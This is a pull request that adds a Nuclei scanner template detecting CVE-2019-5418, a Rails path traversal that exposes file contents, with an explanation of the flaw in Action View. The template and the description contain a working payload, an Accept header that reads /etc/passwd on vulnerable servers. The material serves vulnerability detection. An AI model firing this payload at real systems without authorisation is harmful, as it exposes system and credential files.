### PR TITLE
feature: Add Detection for CVECVE-2019-5418.

### DIFF
--- a/nuclei/CVE-2019-5418.yaml
+++ b/nuclei/CVE-2019-5418.yaml
@@ -1,0 +1,52 @@
+id: CVE-2019-5418
+
+info:
+  name: Rails File Content Disclosure
+  author: omarkurt
+  severity: high
+  description: Rails <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 are susceptible to a file content disclosure vulnerability because specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed.
+  impact: |
+    This vulnerability can lead to unauthorized access to sensitive information stored on the server.
+  remediation: |
+    Apply the patch provided by the Rails team or upgrade to a version that includes the fix.
+  reference:
+    - https://github.com/omarkurt/CVE-2019-5418
+    - https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-5418
+    - https://www.exploit-db.com/exploits/46585/
+    - http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00011.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2019-5418
+    cwe-id: CWE-22,NVD-CWE-noinfo
+    epss-score: 0.94218
+    epss-percentile: 0.99917
+    cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    vendor: rubyonrails
+    product: rails
+    shodan-query: cpe:"cpe:2.3:a:rubyonrails:rails"
+  tags: cve,cve2019,rails,lfi,disclosure,edb,rubyonrails
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    headers:
+      Accept: ../../../../../../../../etc/passwd{{
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200
+          - 500
+# digest: 490a0046304402203a78614f55baf300f85c2a85206c528ae1e2c08ffb8ab5763a77c70b7fc346300220550f4efec3c5160032fc3c730ec0f161113c5c06bcb14835ef9803dca1c6eb3c:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
### **Add Detection for File Content Disclosure on Rails (CVE-2019-5418)**

This PR introduces a Nuclei template to detect CVE-2019-5418, a `HIGH` File Content Disclosure in in `Action View` `<5.2.2.1`, `<5.1.6.2`, `<5.0.7.2`, `<4.2.11.1` and `v3`.

Details:
The vulnerability exploits a path traversal flaw in the Action View rendering pipeline, specifically within the `find_file` method in `template_renderer.rb`.
When the render method processes views outside the application scope, it uses the method `find_templates` from the `PathResolver` to resolve the path.
The latter method takes a pattern to resolve & find the path;
The vulnerability arises from the ability to manipulate and inject a payload used to construct this pattern in the `build_query` method:
E.g., pattern: `template.:variants` & `variants` variable as `['mobile', 'tablet', 'desktop']` will produce: `template.{mobile,tablet,desktop}`
The `variants` variable can be manipulated via the Accept header:
`Acceptt: ../../../../../../../../../etc/passwd{{`

**Tested against ~4291 diverse non-vulnerable web servers** with zero false positives observed.
    
**Unable to find a public/accessible vulnerable target.**
